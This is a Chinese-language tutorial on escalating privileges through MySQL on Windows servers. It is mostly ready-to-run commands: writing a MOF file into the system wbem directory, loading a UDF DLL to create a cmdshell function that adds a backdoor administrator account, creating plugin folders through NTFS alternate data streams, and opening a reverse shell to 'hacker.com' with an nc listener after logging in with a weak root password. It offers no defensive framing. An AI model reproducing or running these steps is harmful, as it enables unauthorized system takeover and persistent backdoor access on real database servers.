mysql常用的提权方法

2，通过SQL语句 读取nullevt.mof，然后导出到 mof 目录下

select load_file(‘C:/recycler/nullevt.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof‘

二，利用UDF提权

udf提权这是最常见的提权方式了，但是往往在执行过程中老是遇到"Can‘t open shared library"的情况，这里我们可以利用NTFS ADS流来解决这个问题。

1、最常见的是直接使用udf.php此类的工具来执行udf提权，具体如下。

连接到mysql以后，先导出udf.dll到 c:\windows\system32 目录下。

2、创建相应的函数并执行命令，具体如下：

create function cmdshell returns string soname ‘udf.dll‘; -- 创建函数
select cmdshell(‘net user demon 123456 /add‘);  
select cmdshell(‘net localgroup administrators demon /add‘);
drop function cmdshell; -- 删除函数
delete from mysql.func where name=‘cmdshell‘  -- 删除函数

3、某些情况下，我们会遇到Can‘t open shared library的情况，这时就需要我们把udf.dll导出到lib\plugin目录下才可以，

但是默认情况下plugin不存在，怎么办？ 还好有大牛研究出了利用NTFS ADS流来创建文件夹的方法

select @@basedir;   -- 查找到mysql的目录
select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\phpstudy\\MySQL\\lib::$INDEX_ALLOCATION‘;  -- 利用NTFS ADS创建lib目录
select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\phpstudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION‘; -- 利用NTFS ADS创建plugin目录

• 当默认udf导出失败时，可以尝试用手动方法导出udf进行提权，具体方法如下：
  先上传udf.dll，连接到mysql，再按下面步骤执行sql语句。

      create table zz(abc longblob);//注意列类型为longblob
      insert into zz values(load_file(‘C:\\udf.dll‘)); //上传的udf.dll路径
      select * from zz into dumpfile ‘C://WINDOWS//system32//udf.dll‘; //导入的目标地址 mysql 5.0以上要导入到系统目录
      Create Function MyCmd returns string soname ‘udf.dll‘; //这里如果导出的路径为C://WINDOWS//system32//udf2.dll‘ 可以将后面改成udf2.dll
      select MyCmd (‘ net user ‘);
      drop function MyCmd;

  删除udf.dll 的方法，先删除生成的函数
  Drop function MyCmd;

三，反弹 shell 提权

假如我们扫到了一个mysql的root弱密码，并且可以外连，但是服务器上面的网站又无法Getshell，这时我们怎么办呢？

1、利用mysql客户端工具连接mysql服务器，然后执行下面的操作。

mysql.exe -h target.com -uroot -p password
mysql> \. c:\mysql.txt
mysql> select backshell("hacker.com",444);

2、本地监听你反弹的端口

nc.exe -vlp 444

成功后，你将获得一个system权限的cmdshell，其实这个也是利用的UDF提权。

mysql常用的提权方法

标签：客户端   函数   wql   读取   ram   利用   mysql服务器   dll导出   dir